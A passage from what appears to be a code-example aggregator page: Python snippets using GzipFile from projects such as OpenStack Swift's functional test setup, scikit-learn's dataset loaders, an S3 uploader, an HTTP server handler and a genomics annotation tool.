    # sample files. A mixture of files from the two sources is allowed.
    proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf')
    _info('Using proxy config from %s' % proxy_conf)
    swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf')
    _info('Using swift config from %s' % swift_conf_src)

    monkey_patch_mimetools()

    global _testdir
    _testdir = os.path.join(mkdtemp(), 'tmp_functional')
    utils.mkdirs(_testdir)
    rmtree(_testdir)
    utils.mkdirs(os.path.join(_testdir, 'sda1'))
    utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp'))

    swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir)
    obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir)

    global orig_swift_conf_name
    orig_swift_conf_name = utils.SWIFT_CONF_FILE
    utils.SWIFT_CONF_FILE = swift_conf
    constraints.reload_constraints()
    storage_policy.SWIFT_CONF_FILE = swift_conf
    storage_policy.reload_storage_policies()
    global config
    if constraints.SWIFT_CONSTRAINTS_LOADED:
        # Use the swift constraints that are loaded for the test framework
        # configuration
        _c = dict(
            (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items())
        config.update(_c)
    else:
        # In-process swift constraints were not loaded, something's wrong
        raise SkipTest
    global orig_hash_path_suff_pref
    orig_hash_path_suff_pref = utils.HASH_PATH_PREFIX, utils.HASH_PATH_SUFFIX
    utils.validate_hash_conf()

    # We create the proxy server listening socket to get its port number so
    # that we can add it as the "auth_port" value for the functional test
    # clients.
    prolis = eventlet.listen(('localhost', 0))

    # The following set of configuration values is used both for the
    # functional test framework and for the various proxy, account, container
    # and object servers.
    config.update({
        # Values needed by the various in-process swift servers
        'devices': _testdir,
        'swift_dir': _testdir,
        'mount_check': 'false',
        'client_timeout': '4',
        'allow_account_management': 'true',
        'account_autocreate': 'true',
        'allow_versions': 'True',
        # Below are values used by the functional test framework, as well as
        # by the various in-process swift servers
        'auth_host': '127.0.0.1',
        'auth_port': str(prolis.getsockname()[1]),
        'auth_ssl': 'no',
        'auth_prefix': '/auth/',
        # Primary functional test account (needs admin access to the
        # account)
        'account': 'test',
        'username': '******',
        'password': '******',
        # User on a second account (needs admin access to the account)
        'account2': 'test2',
        'username2': 'tester2',
        'password2': 'testing2',
        # User on same account as first, but without admin access
        'username3': 'tester3',
        'password3': 'testing3',
        # Service user and prefix (emulates glance, cinder, etc. user)
        'account5': 'test5',
        'username5': 'tester5',
        'password5': 'testing5',
        'service_prefix': 'SERVICE',
        # For tempauth middleware. Update reseller_prefix
        'reseller_prefix': 'AUTH, SERVICE',
        'SERVICE_require_group': 'service'
    })

    acc1lis = eventlet.listen(('localhost', 0))
    acc2lis = eventlet.listen(('localhost', 0))
    con1lis = eventlet.listen(('localhost', 0))
    con2lis = eventlet.listen(('localhost', 0))

    account_ring_path = os.path.join(_testdir, 'account.ring.gz')
    with closing(GzipFile(account_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': acc1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': acc2lis.getsockname()[1]
                          }], 30), f)
    container_ring_path = os.path.join(_testdir, 'container.ring.gz')
    with closing(GzipFile(container_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': con1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': con2lis.getsockname()[1]
                          }], 30), f)

    eventlet.wsgi.HttpProtocol.default_request_version = "HTTP/1.0"
    # Turn off logging requests by the underlying WSGI software.
    eventlet.wsgi.HttpProtocol.log_request = lambda *a: None
    logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi')
    # Redirect logging other messages by the underlying WSGI software.
    eventlet.wsgi.HttpProtocol.log_message = \
        lambda s, f, *a: logger.error('ERROR WSGI: ' + f % a)
    # Default to only 4 seconds for in-process functional test runs
    eventlet.wsgi.WRITE_TIMEOUT = 4

    acc1srv = account_server.AccountController(config,
                                               logger=debug_logger('acct1'))
    acc2srv = account_server.AccountController(config,
                                               logger=debug_logger('acct2'))
    con1srv = container_server.ContainerController(
        config, logger=debug_logger('cont1'))
    con2srv = container_server.ContainerController(
        config, logger=debug_logger('cont2'))

    objsrvs = [(obj_sockets[index],
                the_object_server.ObjectController(config,
                                                   logger=debug_logger(
                                                       'obj%d' % (index + 1))))
               for index in range(len(obj_sockets))]

    logger = debug_logger('proxy')

    def get_logger(name, *args, **kwargs):
        return logger

    with mock.patch('swift.common.utils.get_logger', get_logger):
        with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware',
                        FakeMemcacheMiddleware):
            try:
                app = loadapp(proxy_conf, global_conf=config)
            except Exception as e:
                raise InProcessException(e)

    nl = utils.NullLogger()
    prospa = eventlet.spawn(eventlet.wsgi.server, prolis, app, nl)
    acc1spa = eventlet.spawn(eventlet.wsgi.server, acc1lis, acc1srv, nl)
    acc2spa = eventlet.spawn(eventlet.wsgi.server, acc2lis, acc2srv, nl)
    con1spa = eventlet.spawn(eventlet.wsgi.server, con1lis, con1srv, nl)
    con2spa = eventlet.spawn(eventlet.wsgi.server, con2lis, con2srv, nl)

    objspa = [
        eventlet.spawn(eventlet.wsgi.server, objsrv[0], objsrv[1], nl)
        for objsrv in objsrvs
    ]

    global _test_coros
    _test_coros = \
        (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa)

    # Create accounts "test" and "test2"
    def create_account(act):
        ts = utils.normalize_timestamp(time())
        account_ring = Ring(_testdir, ring_name='account')
        partition, nodes = account_ring.get_nodes(act)
        for node in nodes:
            # Note: we are just using the http_connect method in the object
            # controller here to talk to the account server nodes.
            conn = swift.proxy.controllers.obj.http_connect(
                node['ip'], node['port'], node['device'], partition, 'PUT',
                '/' + act, {
                    'X-Timestamp': ts,
                    'x-trans-id': act
                })
            resp = conn.getresponse()
            assert (resp.status == 201)

    create_account('AUTH_test')
    create_account('AUTH_test2')
Example #17
def fetch_covtype(data_home=None,
                  download_if_missing=True,
                  random_state=None,
                  shuffle=False,
                  return_X_y=False):
    """Load the covertype dataset (classification).

    Download it if necessary.

    =================   ============
    Classes                        7
    Samples total             581012
    Dimensionality                54
    Features                     int
    =================   ============

    Read more in the :ref:`User Guide <covtype_dataset>`.

    Parameters
    ----------
    data_home : string, optional
        Specify another download and cache folder for the datasets. By default
        all scikit-learn data is stored in '~/scikit_learn_data' subfolders.

    download_if_missing : boolean, default=True
        If False, raise an IOError if the data is not locally available
        instead of trying to download the data from the source site.

    random_state : int, RandomState instance or None (default)
        Determines random number generation for dataset shuffling. Pass an int
        for reproducible output across multiple function calls.
        See :term:`Glossary <random_state>`.

    shuffle : bool, default=False
        Whether to shuffle dataset.

    return_X_y : boolean, default=False.
        If True, returns ``(data.data, data.target)`` instead of a Bunch
        object.

        .. versionadded:: 0.20

    Returns
    -------
    dataset : dict-like object with the following attributes:

    dataset.data : numpy array of shape (581012, 54)
        Each row corresponds to the 54 features in the dataset.

    dataset.target : numpy array of shape (581012,)
        Each value corresponds to one of the 7 forest covertypes with values
        ranging from 1 to 7.

    dataset.DESCR : string
        Description of the forest covertype dataset.

    (data, target) : tuple if ``return_X_y`` is True

        .. versionadded:: 0.20
    """

    data_home = get_data_home(data_home=data_home)
    covtype_dir = join(data_home, "covertype")
    samples_path = _pkl_filepath(covtype_dir, "samples")
    targets_path = _pkl_filepath(covtype_dir, "targets")
    available = exists(samples_path)

    if download_if_missing and not available:
        if not exists(covtype_dir):
            makedirs(covtype_dir)
        logger.info("Downloading %s" % ARCHIVE.url)

        archive_path = _fetch_remote(ARCHIVE, dirname=covtype_dir)
        Xy = np.genfromtxt(GzipFile(filename=archive_path), delimiter=',')
        # delete archive
        remove(archive_path)

        X = Xy[:, :-1]
        y = Xy[:, -1].astype(np.int32, copy=False)

        joblib.dump(X, samples_path, compress=9)
        joblib.dump(y, targets_path, compress=9)

    elif not available and not download_if_missing:
        raise IOError("Data not found and `download_if_missing` is False")
    try:
        X, y
    except NameError:
        X, y = _refresh_cache([samples_path, targets_path], 9)
        # TODO: Revert to the following two lines in v0.23
        # X = joblib.load(samples_path)
        # y = joblib.load(targets_path)

    if shuffle:
        ind = np.arange(X.shape[0])
        rng = check_random_state(random_state)
        rng.shuffle(ind)
        X = X[ind]
        y = y[ind]

    module_path = dirname(__file__)
    with open(join(module_path, 'descr', 'covtype.rst')) as rst_file:
        fdescr = rst_file.read()

    if return_X_y:
        return X, y

    return Bunch(data=X, target=y, DESCR=fdescr)
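# Usage sketch (assumes scikit-learn is installed; the first call downloads
# and caches the dataset under data_home):
from sklearn.datasets import fetch_covtype
X, y = fetch_covtype(return_X_y=True)
print(X.shape)  # (581012, 54), per the table in the docstring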
Example #18
File: text.py Project: zksfyz/django
def compress_string(s):
    zbuf = BytesIO()
    with GzipFile(mode='wb', compresslevel=6, fileobj=zbuf) as zfile:
        zfile.write(s)
    return zbuf.getvalue()
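# A matching decompressor is not part of the snippet; a minimal sketch:
def decompress_string(s):
    with GzipFile(mode='rb', fileobj=BytesIO(s)) as zfile:
        return zfile.read()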
Example #19
def fetch_rcv1(data_home=None,
               subset='all',
               download_if_missing=True,
               random_state=None,
               shuffle=False):
    """Load the RCV1 multilabel dataset, downloading it if necessary.

    Version: RCV1-v2, vectors, full sets, topics multilabels.

    ==============     =====================
    Classes                              103
    Samples total                     804414
    Dimensionality                     47236
    Features           real, between 0 and 1
    ==============     =====================

    Read more in the :ref:`User Guide <datasets>`.

    Parameters
    ----------
    data_home : string, optional
        Specify another download and cache folder for the datasets. By default
        all scikit-learn data is stored in '~/scikit_learn_data' subfolders.

    subset : string, 'train', 'test', or 'all', default='all'
        Select the dataset to load: 'train' for the training set
        (23149 samples), 'test' for the test set (781265 samples),
        'all' for both, with the training samples first if shuffle is False.
        This follows the official LYRL2004 chronological split.

    download_if_missing : boolean, default=True
        If False, raise an IOError if the data is not locally available
        instead of trying to download the data from the source site.

    random_state : int, RandomState instance or None, optional (default=None)
        Random state for shuffling the dataset.
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.

    shuffle : bool, default=False
        Whether to shuffle dataset.

    Returns
    -------
    dataset : dict-like object with the following attributes:

    dataset.data : scipy csr array, dtype np.float64, shape (804414, 47236)
        The array has 0.16% of non zero values.

    dataset.target : scipy csr array, dtype np.uint8, shape (804414, 103)
        Each sample has a value of 1 in its categories, and 0 in others.
        The array has 3.15% of non zero values.

    dataset.sample_id : numpy array, dtype np.uint32, shape (804414,)
        Identification number of each sample, as ordered in dataset.data.

    dataset.target_names : numpy array, dtype object, length (103)
        Names of each target (RCV1 topics), as ordered in dataset.target.

    dataset.DESCR : string
        Description of the RCV1 dataset.

    Reference
    ---------
    Lewis, D. D., Yang, Y., Rose, T. G., & Li, F. (2004). RCV1: A new
    benchmark collection for text categorization research. The Journal of
    Machine Learning Research, 5, 361-397.

    """
    N_SAMPLES = 804414
    N_FEATURES = 47236
    N_CATEGORIES = 103
    N_TRAIN = 23149

    data_home = get_data_home(data_home=data_home)
    rcv1_dir = join(data_home, "RCV1")
    if download_if_missing:
        makedirs(rcv1_dir, exist_ok=True)

    samples_path = join(rcv1_dir, "samples.pkl")
    sample_id_path = join(rcv1_dir, "sample_id.pkl")
    sample_topics_path = join(rcv1_dir, "sample_topics.pkl")
    topics_path = join(rcv1_dir, "topics_names.pkl")

    # load data (X) and sample_id
    if download_if_missing and (not exists(samples_path)
                                or not exists(sample_id_path)):
        file_urls = ["%s_test_pt%d.dat.gz" % (URL, i) for i in range(4)]
        file_urls.append("%s_train.dat.gz" % URL)
        files = []
        for file_url in file_urls:
            logger.warning("Downloading %s" % file_url)
            with closing(urlopen(file_url)) as online_file:
                # buffer the full file in memory so that GzipFile can
                # decompress it correctly
                f = BytesIO(online_file.read())
            files.append(GzipFile(fileobj=f))

        Xy = load_svmlight_files(files, n_features=N_FEATURES)

        # Training data is before testing data
        X = sp.vstack([Xy[8], Xy[0], Xy[2], Xy[4], Xy[6]]).tocsr()
        sample_id = np.hstack((Xy[9], Xy[1], Xy[3], Xy[5], Xy[7]))
        sample_id = sample_id.astype(np.uint32)

        joblib.dump(X, samples_path, compress=9)
        joblib.dump(sample_id, sample_id_path, compress=9)

    else:
        X = joblib.load(samples_path)
        sample_id = joblib.load(sample_id_path)

    # load target (y), categories, and sample_id_bis
    if download_if_missing and (not exists(sample_topics_path)
                                or not exists(topics_path)):
        logger.warning("Downloading %s" % URL_topics)
        with closing(urlopen(URL_topics)) as online_topics:
            f = BytesIO(online_topics.read())

        # parse the target file
        n_cat = -1
        n_doc = -1
        doc_previous = -1
        y = np.zeros((N_SAMPLES, N_CATEGORIES), dtype=np.uint8)
        sample_id_bis = np.zeros(N_SAMPLES, dtype=np.int32)
        category_names = {}
        for line in GzipFile(fileobj=f, mode='rb'):
            line_components = line.decode("ascii").split(u" ")
            if len(line_components) == 3:
                cat, doc, _ = line_components
                if cat not in category_names:
                    n_cat += 1
                    category_names[cat] = n_cat

                doc = int(doc)
                if doc != doc_previous:
                    doc_previous = doc
                    n_doc += 1
                    sample_id_bis[n_doc] = doc
                y[n_doc, category_names[cat]] = 1

        # Samples in X are ordered with sample_id,
        # whereas in y, they are ordered with sample_id_bis.
        permutation = _find_permutation(sample_id_bis, sample_id)
        y = y[permutation, :]

        # save category names in a list, in the same order as y
        categories = np.empty(N_CATEGORIES, dtype=object)
        for k in category_names.keys():
            categories[category_names[k]] = k

        # reorder categories in lexicographic order
        order = np.argsort(categories)
        categories = categories[order]
        y = sp.csr_matrix(y[:, order])

        joblib.dump(y, sample_topics_path, compress=9)
        joblib.dump(categories, topics_path, compress=9)

    else:
        y = joblib.load(sample_topics_path)
        categories = joblib.load(topics_path)

    if subset == 'all':
        pass
    elif subset == 'train':
        X = X[:N_TRAIN, :]
        y = y[:N_TRAIN, :]
        sample_id = sample_id[:N_TRAIN]
    elif subset == 'test':
        X = X[N_TRAIN:, :]
        y = y[N_TRAIN:, :]
        sample_id = sample_id[N_TRAIN:]
    else:
        raise ValueError("Unknown subset parameter. Got '%s' instead of one"
                         " of ('all', 'train', 'test')" % subset)

    if shuffle:
        X, y, sample_id = shuffle_(X, y, sample_id, random_state=random_state)

    return Bunch(data=X,
                 target=y,
                 sample_id=sample_id,
                 target_names=categories,
                 DESCR=__doc__)
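# Usage sketch (assumes scikit-learn is installed; the first call triggers a
# large download):
from sklearn.datasets import fetch_rcv1
rcv1 = fetch_rcv1(subset='train')
print(rcv1.data.shape)  # (23149, 47236) for the training split, per the docstring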
Example #20
def putter(put, put_queue, stat_queue, options):
    logger = logging.getLogger(
        '%s[putter-%d]' %
        (os.path.basename(sys.argv[0]), current_process().pid))
    connection, bucket = None, None
    file_object_cache = FileObjectCache()
    # Figure out what content types we want to gzip
    if not options.gzip_type:  # default
        gzip_content_types = GZIP_CONTENT_TYPES
    elif 'all' in options.gzip_type:
        gzip_content_types = GZIP_ALL
    else:
        gzip_content_types = options.gzip_type
    if 'guess' in gzip_content_types:
        # don't bother removing 'guess' from the list since nothing will match it
        gzip_content_types.extend(GZIP_CONTENT_TYPES)
    if options.gzip:
        logger.debug('These content types will be gzipped: %s' %
                     unicode(gzip_content_types))
    while True:
        args = put_queue.get()
        if args is None:
            put_queue.task_done()
            break
        key_name, value_kwargs = args
        value = Value(file_object_cache, **value_kwargs)
        should_gzip = False
        try:
            if connection is None:
                connection = S3Connection(is_secure=options.secure,
                                          host=options.host)
            if bucket is None:
                bucket = connection.get_bucket(options.bucket)
            key = put(bucket, key_name, value)
            if key:
                if value.should_copy_content():
                    if options.headers:
                        headers = dict(
                            tuple(header.split(':', 1))
                            for header in options.headers)
                    else:
                        headers = {}

                    content_type = None
                    if options.content_type:
                        if options.content_type == 'guess':
                            content_type = mimetypes.guess_type(value.path)[0]
                        elif options.content_type == 'magic':
                            content_type = mimetypes.guess_type(value.path)[0]
                            if content_type is None:
                                content_type = magic.from_file(value.path,
                                                               mime=True)
                        else:
                            content_type = options.content_type
                        headers['Content-Type'] = content_type

                    content = value.get_content()
                    md5 = value.md5
                    should_gzip = options.gzip and (
                        content_type and content_type in gzip_content_types
                        or gzip_content_types == GZIP_ALL)
                    if should_gzip:
                        headers['Content-Encoding'] = 'gzip'
                        string_io = StringIO()
                        gzip_file = GzipFile(compresslevel=9,
                                             fileobj=string_io,
                                             mode='w')
                        gzip_file.write(content)
                        gzip_file.close()
                        content = string_io.getvalue()
                        md5 = compute_md5(StringIO(content))
                    if not options.dry_run:
                        key.set_contents_from_string(
                            content,
                            headers,
                            md5=md5,
                            policy=options.grant,
                            encrypt_key=options.encrypt_key)
                logger.info(
                    '%s %s> %s' %
                    (value.path, 'z' if should_gzip else '-', key.name))
                stat_queue.put(dict(size=value.get_size()))
            else:
                logger.info('skipping %s -> %s' % (value.path, key_name))
        except SSLError as exc:
            logger.error('%s -> %s (%s)' % (value.path, key_name, exc))
            put_queue.put(args)
            connection, bucket = None, None
        except IOError as exc:
            logger.error('%s -> %s (%s)' % (value.path, key_name, exc))
        put_queue.task_done()
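
Objects uploaded through the gzip branch above arrive with Content-Encoding: gzip, so a consumer has to reverse the transformation. A minimal sketch (gunzip_bytes is a hypothetical helper, not part of this module):

from gzip import GzipFile
from io import BytesIO

def gunzip_bytes(blob):
    # Decompress a gzip-encoded object body back to its original bytes.
    with GzipFile(fileobj=BytesIO(blob), mode='rb') as gz:
        return gz.read()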
Example #21
File: HTTPS.py Project: self20/Anomos
class HTTPSConnection(Dispatcher):
    def __init__(self, socket, getfunc):
        Dispatcher.__init__(self, socket)
        self.req = ''
        self.set_terminator('\n')
        self.getfunc = getfunc
        self.next_func = self.read_type

    ## HTTP handling methods ##
    def read_type(self, data):
        self.header = data.strip()
        words = data.split()
        if len(words) == 3:
            self.command, self.path, garbage = words
            self.pre1 = False
        elif len(words) == 2:
            self.command, self.path = words
            self.pre1 = True
            if self.command != 'GET':
                return None
        else:
            return None
        if self.command not in ('HEAD', 'GET'):
            return None
        self.headers = {}
        return self.read_header

    def read_header(self, data):
        data = data.strip()
        if data == '':
            # check for Accept-Encoding: header, pick an encoding we support
            if self.headers.has_key('accept-encoding'):
                ae = self.headers['accept-encoding']
                log.debug("Got Accept-Encoding: " + ae + "\n")
            else:
                #identity assumed if no header
                ae = 'identity'
            # this eventually needs to support multiple acceptable types
            # q-values and all that fancy HTTP crap
            # for now assume we're only communicating with our own client
            if ae.find('gzip') != -1:
                self.encoding = 'gzip'
            else:
                #default to identity.
                self.encoding = 'identity'
            r = self.getfunc(self, self.path, self.headers)
            if r is not None:
                self.answer(r)
                return None
        try:
            i = data.index(':')
        except ValueError:
            return None
        self.headers[data[:i].strip().lower()] = data[i+1:].strip()
        log.debug(data[:i].strip() + ": " + data[i+1:].strip())
        return self.read_header

    def answer(self, (responsecode, responsestring, headers, data)):
        if self.encoding == 'gzip':
            #transform data using gzip compression
            #this is nasty but i'm unsure of a better way at the moment
            compressed = StringIO()
            gz = GzipFile(fileobj = compressed, mode = 'wb', compresslevel = 9)
            gz.write(data)
            gz.close()
            compressed.seek(0,0)
            cdata = compressed.read()
            compressed.close()
            if len(cdata) >= len(data):
                self.encoding = 'identity'
            else:
                log.debug("Compressed: %i  Uncompressed: %i\n" % (len(cdata),len(data)))
                data = cdata
                headers['Content-Encoding'] = 'gzip'

        # i'm abusing the identd field here, but this should be ok
        if self.encoding == 'identity':
            ident = '-'
        else:
            ident = self.encoding
        username = '******'
        referer = self.headers.get('referer','-')
        useragent = self.headers.get('user-agent','-')
        timestamp = strftime("%d/%b/%Y:%H:%M:%S")
        log.info('%s %s %s [%s] "%s" %i %i "%s" "%s"' % (
                  self.socket.addr[0], ident, username, timestamp, self.header,
                  responsecode, len(data), referer, useragent))

        r = StringIO()
        r.write('HTTP/1.0 ' + str(responsecode) + ' ' + responsestring + '\r\n')
        if not self.pre1:
            headers['Content-Length'] = len(data)
            for key, value in headers.items():
                r.write(key + ': ' + str(value) + '\r\n')
            r.write('\r\n')
        if self.command != 'HEAD':
            r.write(data)

        self.push(r.getvalue())
        self.close_when_done()
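
The answer() method keeps the compressed body only when it is actually smaller than the original. That guard generalizes to a small standalone helper; a sketch written with io.BytesIO (maybe_gzip is illustrative, not part of Anomos):

from gzip import GzipFile
from io import BytesIO

def maybe_gzip(data, level=9):
    # Return (encoding, payload); fall back to identity when gzip
    # does not shrink the payload, mirroring the guard in answer().
    buf = BytesIO()
    with GzipFile(fileobj=buf, mode='wb', compresslevel=level) as gz:
        gz.write(data)
    cdata = buf.getvalue()
    if len(cdata) >= len(data):
        return 'identity', data
    return 'gzip', cdata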
Example #22
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 31 11:45:12 2017

@author: jabong
"""

import numpy as np
from collections import defaultdict
from itertools import chain
from gzip import GzipFile

minsupport = 80

dataset = [[int(tok) for tok in line.strip().split()]
             for line in GzipFile('data/retail.dat.gz')]

counts = defaultdict(int)
for elem in chain(*dataset):
    counts[elem] += 1

valid = set(el for el,c in counts.items() if (c >= minsupport))
dataset = [[el for el in ds if (el in valid)] for ds in dataset]
dataset = [frozenset(ds) for ds in dataset]

itemsets = [frozenset([v]) for v in valid]
freqsets = itemsets[:]
for i in range(16):
    print("At iteration {}, number of frequent buskets: {}".format(i, len(itemsets)))
    nextsets = []
    tested = set()
Example #23
def _in_process_setup_ring(swift_conf, conf_src_dir, testdir):
    """
    If SWIFT_TEST_POLICY is set:
    - look in swift.conf file for specified policy
    - move this to be policy-0 but preserving its options
    - copy its ring file to test dir, changing its devices to suit
      in process testing, and renaming it to suit policy-0
    Otherwise, create a default ring file.
    """
    conf = ConfigParser()
    conf.read(swift_conf)
    sp_prefix = 'storage-policy:'

    try:
        # policy index 0 will be created if no policy exists in conf
        policies = parse_storage_policies(conf)
    except PolicyError as e:
        raise InProcessException(e)

    # clear all policies from test swift.conf before adding test policy back
    for policy in policies:
        conf.remove_section(sp_prefix + str(policy.idx))

    if policy_specified:
        policy_to_test = policies.get_by_name(policy_specified)
        if policy_to_test is None:
            raise InProcessException('Failed to find policy name "%s"' %
                                     policy_specified)
        _info('Using specified policy %s' % policy_to_test.name)
    else:
        policy_to_test = policies.default
        _info('Defaulting to policy %s' % policy_to_test.name)

    # make policy_to_test be policy index 0 and default for the test config
    sp_zero_section = sp_prefix + '0'
    conf.add_section(sp_zero_section)
    for (k, v) in policy_to_test.get_info(config=True).items():
        conf.set(sp_zero_section, k, v)
    conf.set(sp_zero_section, 'default', True)

    with open(swift_conf, 'w') as fp:
        conf.write(fp)

    # look for a source ring file
    ring_file_src = ring_file_test = 'object.ring.gz'
    if policy_to_test.idx:
        ring_file_src = 'object-%s.ring.gz' % policy_to_test.idx
    try:
        ring_file_src = _in_process_find_conf_file(conf_src_dir,
                                                   ring_file_src,
                                                   use_sample=False)
    except InProcessException as e:
        if policy_specified:
            raise InProcessException('Failed to find ring file %s' %
                                     ring_file_src)
        ring_file_src = None

    ring_file_test = os.path.join(testdir, ring_file_test)
    if ring_file_src:
        # copy source ring file to a policy-0 test ring file, re-homing servers
        _info('Using source ring file %s' % ring_file_src)
        ring_data = ring.RingData.load(ring_file_src)
        obj_sockets = []
        for dev in ring_data.devs:
            device = 'sd%c1' % chr(len(obj_sockets) + ord('a'))
            # create a data dir (and tmp dir) for each device in the test tree
            utils.mkdirs(os.path.join(testdir, device))
            utils.mkdirs(os.path.join(testdir, device, 'tmp'))
            obj_socket = listen_zero()
            obj_sockets.append(obj_socket)
            dev['port'] = obj_socket.getsockname()[1]
            dev['ip'] = '127.0.0.1'
            dev['device'] = device
            dev['replication_port'] = dev['port']
            dev['replication_ip'] = dev['ip']
        ring_data.save(ring_file_test)
    else:
        # make default test ring, 3 replicas, 4 partitions, 3 devices
        # which will work for a replication policy or a 2+1 EC policy
        _info('No source object ring file, creating 3rep/4part/3dev ring')
        obj_sockets = [listen_zero() for _ in (0, 1, 2)]
        replica2part2dev_id = [[0, 1, 2, 0], [1, 2, 0, 1], [2, 0, 1, 2]]
        devs = [{
            'id': 0,
            'zone': 0,
            'device': 'sda1',
            'ip': '127.0.0.1',
            'port': obj_sockets[0].getsockname()[1]
        }, {
            'id': 1,
            'zone': 1,
            'device': 'sdb1',
            'ip': '127.0.0.1',
            'port': obj_sockets[1].getsockname()[1]
        }, {
            'id': 2,
            'zone': 2,
            'device': 'sdc1',
            'ip': '127.0.0.1',
            'port': obj_sockets[2].getsockname()[1]
        }]
        ring_data = ring.RingData(replica2part2dev_id, devs, 30)
        with closing(GzipFile(ring_file_test, 'wb')) as f:
            pickle.dump(ring_data, f)

    for dev in ring_data.devs:
        _debug('Ring file dev: %s' % dev)

    return obj_sockets
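
Reading the test ring back simply reverses the pickle-into-GzipFile step; a sketch following the same closing() convention (Swift's own ring.RingData.load performs this plus format handling):

import pickle
from contextlib import closing
from gzip import GzipFile

with closing(GzipFile(ring_file_test, 'rb')) as f:
    ring_data = pickle.load(f)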
Example #24
 def uncompress(self, sitemapdata):
     sio = StringIO(sitemapdata)
     unziped = GzipFile(fileobj=sio)
     xml = unziped.read()
     unziped.close()
     return xml
Example #25
def gzip_reader(fd, size, url, params):
    """Wraps the input in a :class:`gzip.GzipFile` object."""
    from gzip import GzipFile
    return GzipFile(fileobj=fd), size, url
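
The (fd, size, url, params) signature suggests a pluggable input-reader hook; invoked standalone it might look like the following, with the path purely illustrative:

with open('example.txt.gz', 'rb') as fd:
    stream, size, url = gzip_reader(fd, None, 'file:///example.txt.gz', {})
    first_line = stream.readline()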
Example #26
def annotatebins(bins, outfile, include_chroms, ranges, track, ucsc_track,
                 actions, track_names, track_list, ucsc_list, ucsc_ref, fasta,
                 snv_mus, no_ucsc_chromsplit, maxfloat, bgzip, quiet):
    """
    Annotate bins
    """

    # Sanitize & format inputs
    ucsc_chromsplit = not no_ucsc_chromsplit
    track = list(track)
    ucsc_track = list(ucsc_track)
    actions = tuple([a.lower() for a in actions])

    # Parse file with lists of tracks (if provided) and add to track lists
    if track_list is not None:
        supp_tracks, supp_actions, supp_names = mutrate.parse_track_file(
            track_list)
        track = track + supp_tracks
        n_ucsc_tracks = len(ucsc_track)
        if n_ucsc_tracks > 0:
            actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions \
                            + list(actions[n_ucsc_tracks:]))
            track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names \
                            + list(track_names[n_ucsc_tracks:]))
        else:
            actions = tuple(list(actions) + supp_actions)
            track_names = tuple(list(track_names) + supp_names)

    # Parse file with list of UCSC tracks (if provided) and add to track lists
    if ucsc_list is not None:
        supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = mutrate.parse_track_file(
            ucsc_list)
        ucsc_track = ucsc_track + supp_ucsc_tracks
        actions = tuple(list(actions) + supp_ucsc_actions)
        track_names = tuple(list(track_names) + supp_ucsc_names)

    # Handle header reformatting
    n_tracks = len(track) + len(ucsc_track)
    if n_tracks != len(track_names):
        err = 'INPUT ERROR: Number of supplied track names ({0}) does not ' + \
              'match number of tracks ({1}).'
        exit(err.format(len(track_names), n_tracks))
    if 'compressed' in determine_filetype(bins):
        header = GzipFile(bins).readline().decode('utf-8').rstrip()
    else:
        header = open(bins, 'r').readline().rstrip()
    if not header.startswith('#'):
        status_msg = '[{0}] athena annotate-bins: No header line detected. ' + \
                     'Adding default header.'
        print(status_msg.format(
            datetime.now().strftime('%b %d %Y @ %H:%M:%S')))
        n_extra_cols = len(header.split('\t')) - 3
        header = make_default_bed_header(n_extra_cols)
    newheader = header + '\t' + '\t'.join(list(track_names))
    if fasta is not None:
        newheader = '\t'.join([newheader, 'pct_gc'])
        if snv_mus is not None:
            newheader = '\t'.join([newheader, 'snv_mu'])

    # Annotate bins
    newbins = mutrate.annotate_bins(bins, include_chroms, ranges, track,
                                    ucsc_track, ucsc_ref, actions, fasta,
                                    snv_mus, maxfloat, ucsc_chromsplit, quiet)

    # Save annotated bins
    if 'compressed' in determine_filetype(outfile):
        outfile = path.splitext(outfile)[0]
    newbins.saveas(outfile, trackline=newheader)

    # Bgzip bins, if optioned
    if bgzip:
        bgz(outfile)
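
The header handling above peeks at the first line through GzipFile for compressed inputs and a plain open() otherwise. Pulled out on its own, the pattern might read (a sketch; determine_filetype is athena's helper and is replaced here by a suffix check):

from gzip import GzipFile

def read_header_line(path):
    # First line of a plain or gzip-compressed BED-like file.
    if path.endswith('.gz'):
        with GzipFile(path) as fh:
            return fh.readline().decode('utf-8').rstrip()
    with open(path, 'r') as fh:
        return fh.readline().rstrip()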
Example #27
def gzip(data):
    buff = BytesIO(data)
    f = GzipFile(fileobj=buff)

    return f.read().decode('utf-8')
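
Despite its name, this helper decompresses. Paired with the compress_string example below (Example #29), and assuming both are in scope, a round trip would be:

payload = compress_string(b'hello world')   # bytes -> gzipped bytes
assert gzip(payload) == 'hello world'       # gzipped bytes -> str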
Example #28
def annotatepairs(pairs, outfile, chroms, ranges, track, ucsc_track, actions,
                  track_names, track_list, ucsc_list, ucsc_ref, fasta, binsize,
                  homology_cutoffs, no_ucsc_chromsplit, maxfloat, bgzip,
                  quiet):
    """
    Annotate pairs
    """

    # Sanitize & format inputs
    ucsc_chromsplit = not no_ucsc_chromsplit
